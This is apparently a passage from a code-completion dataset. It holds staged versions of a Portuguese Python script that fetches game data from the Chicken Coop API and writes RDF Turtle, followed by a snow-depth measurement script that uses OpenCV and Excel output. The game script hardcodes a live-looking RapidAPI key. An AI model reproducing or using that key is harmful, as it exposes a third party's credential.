'green', attrs=['bold'])\n cprint(' Nintendo Switch -> switch', 'green', attrs=['bold'])\n cprint('Exemplos de jogos: ', 'yellow', attrs=['bold'])\n cprint(' Uncharted: The Lost Legacy', 'green', attrs=['bold'])\n cprint(' God of War', 'green', attrs=['bold'])\n cprint(' Ori and The Blind Forest', 'green', attrs=['bold'])\n cprint(\n 'Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada, caso contrário, não funcionará!'\n , 'magenta', attrs=['bold'])\n print('\\n')\n\n\ndef get_and_write(mc, csl):\n print(f\"Title: {mc['result']['title']}\")\n print(f\"Release Date: {mc['result']['releaseDate']}\")\n print(f\"Score: {mc['result']['score']}\")\n print(f\"Developer: {mc['result']['developer']}\\n\")\n mc_title = mc['result']['title']\n mc_score = mc['result']['score']\n mc_developer = mc['result']['developer']\n rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)\n if rsp:\n write_file(mc_title, mc_score, mc_developer, mc, csl)\n\n\ndef write_file(title, score, developer, mc, csl):\n source = '<https://www.metacritic.com/game/'\n aux_title = ''\n source = source + csl + '/'\n path = Path('gamedeflib_rdf.ttl')\n if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:\n file = open('gamedeflib_rdf.ttl', 'r')\n count = 1\n for element in file:\n jogo = f'_:game{count}\\n'\n if element == jogo:\n count = count + 1\n file.close()\n file = open('gamedeflib_rdf.ttl', 'a+')\n file.write(f'\\n_:game{count}\\n')\n file.write(f'\\trdfs:label \"{title}\";\\n')\n file.write(f'\\tdbp:score {score};\\n')\n genre_number(mc, file)\n publisher_number(mc, file)\n file.write(f'\\tdbo:developer \"{developer}\";\\n')\n aux_title = title.lower()\n aux_title = aux_title.replace(':', '')\n aux_title = aux_title.replace(' ', '-')\n source = source + aux_title + '>'\n file.write(f'\\tdc:source {source};\\n')\n console_check(csl, file)\n file.close()\n else:\n file = open('gamedeflib_rdf.ttl', 'w+')\n file.write('@prefix dc: \\t<http://purl.org/dc/elements/1.1/> .\\n')\n file.write(\n '@prefix rdf:\\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\\n')\n file.write('@prefix rdfs:\\t<http://www.w3.org/2000/01/rdf-schema#> .\\n'\n )\n file.write('@prefix foaf:\\t<http://xmlns.com/foaf/0.1/> .\\n')\n file.write('@prefix dbo: <http://dbpedia.org/ontology/> .\\n')\n file.write('@prefix dbpedia: <http://dbpedia.org/page/> .\\n')\n file.write('@prefix dbp: <http://dbpedia.org/property/> .\\n')\n file.write(\n \"\"\"dbpedia:PlayStation_4\n\tfoaf:name \"PlayStation 4\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 4\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_3\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 3\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_2\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 2\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation\n\tdbp:type dbpedia:Video_game_console;\n\trdfs:label \"PlayStation\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_One\n\tfoaf:name \"XBox One\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox One\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_360\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox 360\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Nintendo_Switch\n\tfoaf:name \"New Nintendank New Wii U 2.0+\";\n\tdbo:type dbpedia:Video_game_hardware;\n\trdfs:label \"Nintendo Switch\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Computer\n\tdbp:title \"Computer\";\n\trdf:type dbo:Device;\n\trdfs:label \"Computer\" .\n\n\"\"\"\n )\n return 1\n\n\ndef genre_number(mc, f):\n tam = len(mc['result']['genre'])\n for x in range(0, tam):\n print(f\"Genre number {x + 1}: {mc['result']['genre'][x]}\")\n aux = mc['result']['genre'][x]\n f.write(f'\\tdbo:genre \"{aux}\";\\n')\n\n\ndef publisher_number(mc, f):\n tam = len(mc['result']['publisher'])\n for x in range(0, tam):\n print(f\"Publisher number {x + 1}: {mc['result']['publisher'][x]}\")\n aux = mc['result']['publisher'][x]\n f.write(f'\\tdbo:publisher \"{aux}\";\\n')\n\n\ndef main():\n print('Digite o console do jogo desejado: ', end='')\n console = str(input())\n print('Digite o título do jogo desejado: ', end='')\n title = str(input())\n try:\n url = 'https://chicken-coop.p.rapidapi.com/games/' + title\n querystring = {'platform': console}\n headers = {'x-rapidapi-host': 'chicken-coop.p.rapidapi.com',\n 'x-rapidapi-key':\n 'c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n metacritic = json.loads(response.text)\n if metacritic['result'] == 'No result':\n print(\n '\\nAlguma informação digitada está incorreta. Tente novamente.'\n )\n else:\n get_and_write(metacritic, console)\n except Exception as err:\n print(\n 'Algum erro desconhecido ocorreu durante a execucação.\\nTente novamente.'\n )\n cprint(err, 'red')\n\n\ninitial_warnings()\nmain()\nwhile True:\n print('Gostaria de adicionar outro jogo na base RDF: (1 - Sim/0 - Não): ',\n end='')\n try:\n ans = int(input())\n if ans == 1:\n main()\n elif ans == 0:\n print('Encerrando o script')\n break\n else:\n print('Valor digitado deve ser 0 ou 1.')\n except ValueError as e:\n print('Valor foi inserido incorretamente. Tente denovo.')\n cprint(e, 'red')\n", "step-5": "import requests\r\nimport json\r\nfrom termcolor import cprint\r\nfrom pathlib import Path\r\nimport os\r\n\r\n\r\ndef console_check(csl, f):\r\n if csl == 'playstation-4':\r\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\r\n if csl == 'playstation-3':\r\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\r\n if csl == 'playstation-2':\r\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\r\n if csl == 'playstation':\r\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\r\n if csl == 'xbox-one':\r\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\r\n if csl == 'xbox-360':\r\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\r\n if csl == 'switch':\r\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\r\n if csl == 'pc':\r\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\r\n f.write('\\n\\n')\r\n\r\n\r\ndef initial_warnings():\r\n cprint(\"Esse programa funciona usando uma API chamada Chicken Coop API.\", \"red\", attrs=['bold'])\r\n cprint(\"Essa API pega informações sobre jogos de determinados consoles.\", \"red\", attrs=['bold'])\r\n cprint(\"Para que ela rode corretamente, siga as seguintes instruções:\", \"cyan\", attrs=['bold'])\r\n cprint(\"Consoles:\", 'yellow', attrs=['bold'])\r\n cprint(\" Playstation 4 -> playstation-4\", \"green\", attrs=['bold'])\r\n cprint(\" Xbox One -> xbox-one\", \"green\", attrs=['bold'])\r\n cprint(\" Computador -> pc\", \"green\", attrs=['bold'])\r\n cprint(\" Nintendo Switch -> switch\", \"green\", attrs=['bold'])\r\n cprint(\"Exemplos de jogos: \", 'yellow', attrs=['bold'])\r\n cprint(\" Uncharted: The Lost Legacy\", \"green\", attrs=['bold'])\r\n cprint(\" God of War\", \"green\", attrs=['bold'])\r\n cprint(\" Ori and The Blind Forest\", \"green\", attrs=['bold'])\r\n cprint(\"Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada,\"\r\n \" caso contrário, não funcionará!\", 'magenta', attrs=['bold'])\r\n print(\"\\n\")\r\n\r\n\r\ndef get_and_write(mc, csl):\r\n print(f\"Title: {mc['result']['title']}\")\r\n print(f\"Release Date: {mc['result']['releaseDate']}\")\r\n # print(f\"Description: {mc['result']['description']}\")\r\n print(f\"Score: {mc['result']['score']}\")\r\n # print(f\"Rating: {mc['result']['rating']}\")\r\n print(f\"Developer: {mc['result']['developer']}\\n\")\r\n mc_title = mc['result']['title']\r\n # mc_description = mc['result']['description']\r\n mc_score = mc['result']['score']\r\n mc_developer = mc['result']['developer']\r\n rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)\r\n if rsp:\r\n write_file(mc_title, mc_score, mc_developer, mc, csl)\r\n\r\n\r\ndef write_file(title, score, developer, mc, csl):\r\n source = \"<https://www.metacritic.com/game/\"\r\n aux_title = ''\r\n source = source + csl + '/'\r\n path = Path('gamedeflib_rdf.ttl')\r\n if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:\r\n file = open('gamedeflib_rdf.ttl', 'r')\r\n count = 1\r\n for element in file:\r\n jogo = f'_:game{count}\\n'\r\n if element == jogo:\r\n count = count + 1\r\n file.close()\r\n file = open('gamedeflib_rdf.ttl', 'a+')\r\n file.write(f'\\n_:game{count}\\n')\r\n file.write(f'\\trdfs:label \"{title}\";\\n')\r\n file.write(f'\\tdbp:score {score};\\n')\r\n genre_number(mc, file)\r\n publisher_number(mc, file)\r\n file.write(f'\\tdbo:developer \"{developer}\";\\n')\r\n aux_title = title.lower()\r\n aux_title = aux_title.replace(\":\", \"\")\r\n aux_title = aux_title.replace(\" \", \"-\")\r\n source = source + aux_title + \">\"\r\n file.write(f'\\tdc:source {source};\\n')\r\n console_check(csl, file)\r\n file.close()\r\n else:\r\n file = open('gamedeflib_rdf.ttl', 'w+')\r\n file.write(\"@prefix dc: \t<http://purl.org/dc/elements/1.1/> .\\n\")\r\n file.write(\"@prefix rdf:\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\\n\")\r\n file.write(\"@prefix rdfs:\t<http://www.w3.org/2000/01/rdf-schema#> .\\n\")\r\n file.write(\"@prefix foaf:\t<http://xmlns.com/foaf/0.1/> .\\n\")\r\n file.write(\"@prefix dbo: <http://dbpedia.org/ontology/> .\\n\")\r\n file.write(\"@prefix dbpedia: <http://dbpedia.org/page/> .\\n\")\r\n file.write(\"@prefix dbp: <http://dbpedia.org/property/> .\\n\")\r\n file.write('dbpedia:PlayStation_4\\n'\r\n '\\tfoaf:name \"PlayStation 4\";\\n'\r\n '\\tdbo:type dbpedia:Home_video_game_console;\\n'\r\n '\\trdfs:label \"PlayStation 4\".\\n\\n')\r\n file.write('dbpedia:PlayStation_3\\n'\r\n '\\tdbo:type dbpedia:Home_video_game_console;\\n'\r\n '\\trdfs:label \"PlayStation 3\".\\n\\n')\r\n file.write('dbpedia:PlayStation_2\\n'\r\n '\\tdbo:type dbpedia:Home_video_game_console;\\n'\r\n '\\trdfs:label \"PlayStation 2\".\\n\\n')\r\n file.write('dbpedia:PlayStation\\n'\r\n '\\tdbp:type dbpedia:Video_game_console;\\n'\r\n '\\trdfs:label \"PlayStation\".\\n\\n')\r\n file.write('dbpedia:XBox_One\\n'\r\n '\\tfoaf:name \"XBox One\";\\n'\r\n '\\tdbo:type dbpedia:Home_video_game_console;\\n'\r\n '\\trdfs:label \"XBox One\" .\\n\\n')\r\n file.write('dbpedia:XBox_360\\n'\r\n '\\tdbo:type dbpedia:Home_video_game_console;\\n'\r\n '\\trdfs:label \"XBox 360\" .\\n\\n')\r\n file.write('dbpedia:Nintendo_Switch\\n'\r\n '\\tfoaf:name \"New Nintendank New Wii U 2.0+\";\\n'\r\n '\\tdbo:type dbpedia:Video_game_hardware;\\n'\r\n '\\trdfs:label \"Nintendo Switch\" .\\n\\n')\r\n file.write('dbpedia:Computer\\n'\r\n '\\tdbp:title \"Computer\";\\n'\r\n '\\trdf:type dbo:Device;\\n'\r\n '\\trdfs:label \"Computer\" .\\n\\n')\r\n return 1\r\n\r\n\r\ndef genre_number(mc, f):\r\n tam = len(mc['result']['genre'])\r\n for x in range(0, tam):\r\n print(f\"Genre number {x+1}: {mc['result']['genre'][x]}\")\r\n aux = mc['result']['genre'][x]\r\n f.write(f'\\tdbo:genre \"{aux}\";\\n')\r\n\r\n\r\ndef publisher_number(mc, f):\r\n tam = len(mc['result']['publisher'])\r\n for x in range(0, tam):\r\n print(f\"Publisher number {x + 1}: {mc['result']['publisher'][x]}\")\r\n aux = mc['result']['publisher'][x]\r\n f.write(f'\\tdbo:publisher \"{aux}\";\\n')\r\n\r\n\r\ndef main():\r\n print('Digite o console do jogo desejado: ', end='')\r\n console = str(input())\r\n print('Digite o título do jogo desejado: ', end='')\r\n title = str(input())\r\n try:\r\n url = \"https://chicken-coop.p.rapidapi.com/games/\"+title\r\n\r\n querystring = {\"platform\": console}\r\n\r\n headers = {\r\n 'x-rapidapi-host': \"chicken-coop.p.rapidapi.com\",\r\n 'x-rapidapi-key': \"c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26\"\r\n }\r\n\r\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\r\n\r\n metacritic = json.loads(response.text)\r\n\r\n if metacritic['result'] == 'No result':\r\n print(\"\\nAlguma informação digitada está incorreta. Tente novamente.\")\r\n else:\r\n get_and_write(metacritic, console)\r\n\r\n except Exception as err:\r\n print(\"Algum erro desconhecido ocorreu durante a execucação.\\nTente novamente.\")\r\n cprint(err, 'red')\r\n\r\n\r\ninitial_warnings()\r\nmain()\r\nwhile True:\r\n print('Gostaria de adicionar outro jogo na base RDF: (1 - Sim/0 - Não): ', end='')\r\n try:\r\n ans = int(input())\r\n if ans == 1:\r\n main()\r\n elif ans == 0:\r\n print('Encerrando o script')\r\n break\r\n else:\r\n print('Valor digitado deve ser 0 ou 1.')\r\n except ValueError as e:\r\n print('Valor foi inserido incorretamente. Tente denovo.')\r\n cprint(e, 'red')\r\n", "step-ids": [ 6, 7, 8, 9, 10 ] }
[ 6, 7, 8, 9, 10 ]
# import necessary modules import cv2 import xlsxwriter import statistics from matplotlib import pyplot as plt import math import tqdm import numpy as np import datetime def getDepths(imgs, img_names, intersectionCoords, stakeValidity, templateIntersections, upperBorder, tensors, actualTensors, intersectionDist, blobDistTemplate, debug, debug_directory, image_dates, imageSummary): """ Function to calculate the change in snow depth for each stake using the tensor from the specified template Keyword arguments: imgs -- list of input images img_names -- list of corresponding image file names intersectionCoords -- list containing intersection coordinates for input images stakeValidity -- list indicating which stakes in input images are valid templateIntersections -- list containing intersection coordinates for template upperBorder -- upper crop parameter tensors -- tensors from template image actualTensors -- tensors calculated for input images intersectionDist -- list containing distances from blobs to intersection points for input images blobDistTemplate -- list containing blob to intersection point distances from template debug -- bool flag indicating whether output images should be saved debug_directory -- directory where output images should be written image_dates -- list containing dates of images extracted from EXIF data imageSummary -- dictionary containing information about each run """ # list containing median depths for each image median_depths = list() median_depths_est = list() # contains output data for JSON file depth_output = {} # num of images num_images = len(imgs) # create output dictionary for images depths = dict() # create excel workbook and add worksheet dest = str(debug_directory) + 'snow-depths.xlsx' workbook = xlsxwriter.Workbook(dest) worksheet = workbook.add_worksheet() worksheet.set_column(0, len(tensors) + 3, 25) # create format cell_format = workbook.add_format() cell_format.set_align('center') # add titles worksheet.write(0, 0, "Image", cell_format) worksheet.write(0, 1, "Date", cell_format) worksheet.write(0, len(tensors) + 2, "Median Depth (mm)", cell_format) worksheet.write(0, len(tensors) + 3, "Median Estimate (mm)", cell_format) for i, j in enumerate(tensors): worksheet.write(0, i+2, ("Stake %s" % str(i)), cell_format) # start from the first cell row = 1 col = 0 # image iterator iterator = 0 # iterate through images for img_ in tqdm.tqdm(imgs): # create an image to overlay points on if debugging if(debug): img_overlay = img_.copy() # list to hold calculated depths depths_stake = list() estimate_stake = list() # get image name img_name = img_names[iterator] # reset column col = 0 # write to excel file worksheet.write(row, col, img_name, cell_format) if isinstance(image_dates[iterator], datetime.datetime): worksheet.write(row, col + 1, image_dates[iterator].strftime('%x %X'), cell_format) col = 2 # get intersection coordiantes coords_stake = intersectionCoords[img_name] # get blob intersection distances intersection_dist_stake = intersectionDist[img_name] # iterate through stakes in image for i, stake in enumerate(coords_stake): # if stake is valid and intersection point was found if stakeValidity[img_name][i] and stake["average"][1] != False: # add reference circles to output image if debugging # shows intersection point of image with reference to template if(debug): cv2.circle(img_overlay, (int(templateIntersections[i][0]), int(templateIntersections[i][1]) - upperBorder), 5, (255,0,0), 3) cv2.circle(img_overlay, (int(stake["average"][0]), int(stake["average"][1])), 5, (0,255,0), 2) # calculate change in snow depth in mm tensor = actualTensors[img_name][i] if actualTensors[img_name][i] != True else tensors[i] depth_change = ((templateIntersections[i][1] - upperBorder) - stake["average"][1]) * tensor # calculate change in snow depth using blob distances distances_stake = list() for w, x in enumerate(intersection_dist_stake[i]): if x != False: distances_stake.append((abs(blobDistTemplate[i][w]) - abs(x)) * tensor) distance_estimate = statistics.median(distances_stake) if len(distances_stake) > 0 else 0 # write to excel file worksheet.write(row, col + i, "%.2f (%.2f)" % (depth_change, distance_estimate), cell_format) # add to list depths_stake.append(depth_change) estimate_stake.append(distance_estimate) # if stake wasn't valid or intersection point not found else: # if stake was valid if stakeValidity[img_name][i]: worksheet.write(row, col + i, "Not Found", cell_format) # invalid stake else: worksheet.write(row, col + i, "Invalid Stake", cell_format) # append false to array depths_stake.append(False) estimate_stake.append(False) # output debug image if(debug): cv2.imwrite(debug_directory + img_name, img_overlay) # add list to dictionary depths[img_name] = depths_stake # determine median depth valid_depths = [x for x in depths_stake if x != False] valid_estimates = [x for x in estimate_stake if x != False] if(len(valid_depths) > 0): median = statistics.median(valid_depths) median_est = statistics.median(valid_estimates) else: median = False median_est = False # add to median depth list median_depths.append(median) median_depths_est.append(median_est) # write median to excel file if median != False and median > 0: worksheet.write(row, len(tensors) + 2, "%.2f" % median, cell_format) worksheet.write(row, len(tensors) + 3, "%.2f" % median_est, cell_format) elif median != False: worksheet.write(row, len(tensors) + 2, "0.0", cell_format) worksheet.write(row, len(tensors) + 3, "0.0", cell_format) else: worksheet.write(row, len(tensors) + 2, "n/a", cell_format) worksheet.write(row, len(tensors) + 3, "n/a", cell_format) # increment row row += 1 # increment iterator iterator += 1 # update image summary imageSummary[img_name][" "] = "" imageSummary[img_name]["Stake (Depth Calculation)"] = "Depth (mm) Estimate (mm)" for e, depth in enumerate(depths_stake): if isinstance(depth, float): imageSummary[img_name][" %d " % (e+1)] = "%0.2f %0.2f " % \ (depth, estimate_stake[e]) else: imageSummary[img_name][" %d " % (e+1)] = "%s %s " % \ ("n/a", "n/a") # close workbook workbook.close() # remove negative values filterSet = zip(median_depths, median_depths_est, image_dates) filterSet = [(x, y, z) for x, y, z in filterSet if x != False] median_depths, median_depths_est, image_dates = zip(*filterSet) median_depths = np.asarray(median_depths).clip(0) median_depths_est = np.asarray(median_depths_est).clip(0) # generate plot fig,ax = plt.subplots(1) plt.plot(image_dates, median_depths) plt.plot(image_dates, median_depths_est) plt.gcf().autofmt_xdate() plt.legend(['Median Depth', 'Median Estimate'], loc='upper left') ax.set_xlabel("Date") ax.set_ylabel("Snow Depth (mm)") plt.xticks(rotation=75) plt.tight_layout() # save figure plt.savefig(debug_directory + "depth-graph.jpg") plt.close() # return dictionary containing snow depth changes return depths, imageSummary
normal
{ "blob_id": "24a538dcc885b37eb0147a1ee089189f11b20f8a", "index": 7945, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef getDepths(imgs, img_names, intersectionCoords, stakeValidity,\n templateIntersections, upperBorder, tensors, actualTensors,\n intersectionDist, blobDistTemplate, debug, debug_directory, image_dates,\n imageSummary):\n \"\"\"\n Function to calculate the change in snow depth for each stake using the tensor\n from the specified template\n\n Keyword arguments:\n imgs -- list of input images\n img_names -- list of corresponding image file names\n intersectionCoords -- list containing intersection coordinates for input images\n stakeValidity -- list indicating which stakes in input images are valid\n templateIntersections -- list containing intersection coordinates for template\n upperBorder -- upper crop parameter\n tensors -- tensors from template image\n actualTensors -- tensors calculated for input images\n intersectionDist -- list containing distances from blobs to intersection points\n for input images\n blobDistTemplate -- list containing blob to intersection point distances from\n template\n debug -- bool flag indicating whether output images should be saved\n debug_directory -- directory where output images should be written\n image_dates -- list containing dates of images extracted from EXIF data\n imageSummary -- dictionary containing information about each run\n \"\"\"\n median_depths = list()\n median_depths_est = list()\n depth_output = {}\n num_images = len(imgs)\n depths = dict()\n dest = str(debug_directory) + 'snow-depths.xlsx'\n workbook = xlsxwriter.Workbook(dest)\n worksheet = workbook.add_worksheet()\n worksheet.set_column(0, len(tensors) + 3, 25)\n cell_format = workbook.add_format()\n cell_format.set_align('center')\n worksheet.write(0, 0, 'Image', cell_format)\n worksheet.write(0, 1, 'Date', cell_format)\n worksheet.write(0, len(tensors) + 2, 'Median Depth (mm)', cell_format)\n worksheet.write(0, len(tensors) + 3, 'Median Estimate (mm)', cell_format)\n for i, j in enumerate(tensors):\n worksheet.write(0, i + 2, 'Stake %s' % str(i), cell_format)\n row = 1\n col = 0\n iterator = 0\n for img_ in tqdm.tqdm(imgs):\n if debug:\n img_overlay = img_.copy()\n depths_stake = list()\n estimate_stake = list()\n img_name = img_names[iterator]\n col = 0\n worksheet.write(row, col, img_name, cell_format)\n if isinstance(image_dates[iterator], datetime.datetime):\n worksheet.write(row, col + 1, image_dates[iterator].strftime(\n '%x %X'), cell_format)\n col = 2\n coords_stake = intersectionCoords[img_name]\n intersection_dist_stake = intersectionDist[img_name]\n for i, stake in enumerate(coords_stake):\n if stakeValidity[img_name][i] and stake['average'][1] != False:\n if debug:\n cv2.circle(img_overlay, (int(templateIntersections[i][0\n ]), int(templateIntersections[i][1]) - upperBorder),\n 5, (255, 0, 0), 3)\n cv2.circle(img_overlay, (int(stake['average'][0]), int(\n stake['average'][1])), 5, (0, 255, 0), 2)\n tensor = actualTensors[img_name][i] if actualTensors[img_name][\n i] != True else tensors[i]\n depth_change = (templateIntersections[i][1] - upperBorder -\n stake['average'][1]) * tensor\n distances_stake = list()\n for w, x in enumerate(intersection_dist_stake[i]):\n if x != False:\n distances_stake.append((abs(blobDistTemplate[i][w]) -\n abs(x)) * tensor)\n distance_estimate = statistics.median(distances_stake) if len(\n distances_stake) > 0 else 0\n worksheet.write(row, col + i, '%.2f (%.2f)' % (depth_change,\n distance_estimate), cell_format)\n depths_stake.append(depth_change)\n estimate_stake.append(distance_estimate)\n else:\n if stakeValidity[img_name][i]:\n worksheet.write(row, col + i, 'Not Found', cell_format)\n else:\n worksheet.write(row, col + i, 'Invalid Stake', cell_format)\n depths_stake.append(False)\n estimate_stake.append(False)\n if debug:\n cv2.imwrite(debug_directory + img_name, img_overlay)\n depths[img_name] = depths_stake\n valid_depths = [x for x in depths_stake if x != False]\n valid_estimates = [x for x in estimate_stake if x != False]\n if len(valid_depths) > 0:\n median = statistics.median(valid_depths)\n median_est = statistics.median(valid_estimates)\n else:\n median = False\n median_est = False\n median_depths.append(median)\n median_depths_est.append(median_est)\n if median != False and median > 0:\n worksheet.write(row, len(tensors) + 2, '%.2f' % median, cell_format\n )\n worksheet.write(row, len(tensors) + 3, '%.2f' % median_est,\n cell_format)\n elif median != False:\n worksheet.write(row, len(tensors) + 2, '0.0', cell_format)\n worksheet.write(row, len(tensors) + 3, '0.0', cell_format)\n else:\n worksheet.write(row, len(tensors) + 2, 'n/a', cell_format)\n worksheet.write(row, len(tensors) + 3, 'n/a', cell_format)\n row += 1\n iterator += 1\n imageSummary[img_name][' '] = ''\n imageSummary[img_name]['Stake (Depth Calculation)'\n ] = 'Depth (mm) Estimate (mm)'\n for e, depth in enumerate(depths_stake):\n if isinstance(depth, float):\n imageSummary[img_name][' %d ' % (e + 1)\n ] = '%0.2f %0.2f ' % (depth,\n estimate_stake[e])\n else:\n imageSummary[img_name][' %d ' % (e + 1)\n ] = '%s %s ' % ('n/a', 'n/a')\n workbook.close()\n filterSet = zip(median_depths, median_depths_est, image_dates)\n filterSet = [(x, y, z) for x, y, z in filterSet if x != False]\n median_depths, median_depths_est, image_dates = zip(*filterSet)\n median_depths = np.asarray(median_depths).clip(0)\n median_depths_est = np.asarray(median_depths_est).clip(0)\n fig, ax = plt.subplots(1)\n plt.plot(image_dates, median_depths)\n plt.plot(image_dates, median_depths_est)\n plt.gcf().autofmt_xdate()\n plt.legend(['Median Depth', 'Median Estimate'], loc='upper left')\n ax.set_xlabel('Date')\n ax.set_ylabel('Snow Depth (mm)')\n plt.xticks(rotation=75)\n plt.tight_layout()\n plt.savefig(debug_directory + 'depth-graph.jpg')\n plt.close()\n return depths, imageSummary\n", "step-3": "import cv2\nimport xlsxwriter\nimport statistics\nfrom matplotlib import pyplot as plt\nimport math\nimport tqdm\nimport numpy as np\nimport datetime\n\n\ndef getDepths(imgs, img_names, intersectionCoords, stakeValidity,\n templateIntersections, upperBorder, tensors, actualTensors,\n intersectionDist, blobDistTemplate, debug, debug_directory, image_dates,\n imageSummary):\n \"\"\"\n Function to calculate the change in snow depth for each stake using the tensor\n from the specified template\n\n Keyword arguments:\n imgs -- list of input images\n img_names -- list of corresponding image file names\n intersectionCoords -- list containing intersection coordinates for input images\n stakeValidity -- list indicating which stakes in input images are valid\n templateIntersections -- list containing intersection coordinates for template\n upperBorder -- upper crop parameter\n tensors -- tensors from template image\n actualTensors -- tensors calculated for input images\n intersectionDist -- list containing distances from blobs to intersection points\n for input images\n blobDistTemplate -- list containing blob to intersection point distances from\n template\n debug -- bool flag indicating whether output images should be saved\n debug_directory -- directory where output images should be written\n image_dates -- list containing dates of images extracted from EXIF data\n imageSummary -- dictionary containing information about each run\n \"\"\"\n median_depths = list()\n median_depths_est = list()\n depth_output = {}\n num_images = len(imgs)\n depths = dict()\n dest = str(debug_directory) + 'snow-depths.xlsx'\n workbook = xlsxwriter.Workbook(dest)\n worksheet = workbook.add_worksheet()\n worksheet.set_column(0, len(tensors) + 3, 25)\n cell_format = workbook.add_format()\n cell_format.set_align('center')\n worksheet.write(0, 0, 'Image', cell_format)\n worksheet.write(0, 1, 'Date', cell_format)\n worksheet.write(0, len(tensors) + 2, 'Median Depth (mm)', cell_format)\n worksheet.write(0, len(tensors) + 3, 'Median Estimate (mm)', cell_format)\n for i, j in enumerate(tensors):\n worksheet.write(0, i + 2, 'Stake %s' % str(i), cell_format)\n row = 1\n col = 0\n iterator = 0\n for img_ in tqdm.tqdm(imgs):\n if debug:\n img_overlay = img_.copy()\n depths_stake = list()\n estimate_stake = list()\n img_name = img_names[iterator]\n col = 0\n worksheet.write(row, col, img_name, cell_format)\n if isinstance(image_dates[iterator], datetime.datetime):\n worksheet.write(row, col + 1, image_dates[iterator].strftime(\n '%x %X'), cell_format)\n col = 2\n coords_stake = intersectionCoords[img_name]\n intersection_dist_stake = intersectionDist[img_name]\n for i, stake in enumerate(coords_stake):\n if stakeValidity[img_name][i] and stake['average'][1] != False:\n if debug:\n cv2.circle(img_overlay, (int(templateIntersections[i][0\n ]), int(templateIntersections[i][1]) - upperBorder),\n 5, (255, 0, 0), 3)\n cv2.circle(img_overlay, (int(stake['average'][0]), int(\n stake['average'][1])), 5, (0, 255, 0), 2)\n tensor = actualTensors[img_name][i] if actualTensors[img_name][\n i] != True else tensors[i]\n depth_change = (templateIntersections[i][1] - upperBorder -\n stake['average'][1]) * tensor\n distances_stake = list()\n for w, x in enumerate(intersection_dist_stake[i]):\n if x != False:\n distances_stake.append((abs(blobDistTemplate[i][w]) -\n abs(x)) * tensor)\n distance_estimate = statistics.median(distances_stake) if len(\n distances_stake) > 0 else 0\n worksheet.write(row, col + i, '%.2f (%.2f)' % (depth_change,\n distance_estimate), cell_format)\n depths_stake.append(depth_change)\n estimate_stake.append(distance_estimate)\n else:\n if stakeValidity[img_name][i]:\n worksheet.write(row, col + i, 'Not Found', cell_format)\n else:\n worksheet.write(row, col + i, 'Invalid Stake', cell_format)\n depths_stake.append(False)\n estimate_stake.append(False)\n if debug:\n cv2.imwrite(debug_directory + img_name, img_overlay)\n depths[img_name] = depths_stake\n valid_depths = [x for x in depths_stake if x != False]\n valid_estimates = [x for x in estimate_stake if x != False]\n if len(valid_depths) > 0:\n median = statistics.median(valid_depths)\n median_est = statistics.median(valid_estimates)\n else:\n median = False\n median_est = False\n median_depths.append(median)\n median_depths_est.append(median_est)\n if median != False and median > 0:\n worksheet.write(row, len(tensors) + 2, '%.2f' % median, cell_format\n )\n worksheet.write(row, len(tensors) + 3, '%.2f' % median_est,\n cell_format)\n elif median != False:\n worksheet.write(row, len(tensors) + 2, '0.0', cell_format)\n worksheet.write(row, len(tensors) + 3, '0.0', cell_format)\n else:\n worksheet.write(row, len(tensors) + 2, 'n/a', cell_format)\n worksheet.write(row, len(tensors) + 3, 'n/a', cell_format)\n row += 1\n iterator += 1\n imageSummary[img_name][' '] = ''\n imageSummary[img_name]['Stake (Depth Calculation)'\n ] = 'Depth (mm) Estimate (mm)'\n for e, depth in enumerate(depths_stake):\n if isinstance(depth, float):\n imageSummary[img_name][' %d ' % (e + 1)\n ] = '%0.2f %0.2f ' % (depth,\n estimate_stake[e])\n else:\n imageSummary[img_name][' %d ' % (e + 1)\n ] = '%s %s ' % ('n/a', 'n/a')\n workbook.close()\n filterSet = zip(median_depths, median_depths_est, image_dates)\n filterSet = [(x, y, z) for x, y, z in filterSet if x != False]\n median_depths, median_depths_est, image_dates = zip(*filterSet)\n median_depths = np.asarray(median_depths).clip(0)\n median_depths_est = np.asarray(median_depths_est).clip(0)\n fig, ax = plt.subplots(1)\n plt.plot(image_dates, median_depths)\n plt.plot(image_dates, median_depths_est)\n plt.gcf().autofmt_xdate()\n plt.legend(['Median Depth', 'Median Estimate'], loc='upper left')\n ax.set_xlabel('Date')\n ax.set_ylabel('Snow Depth (mm)')\n plt.xticks(rotation=75)\n plt.tight_layout()\n plt.savefig(debug_directory + 'depth-graph.jpg')\n plt.close()\n return depths, 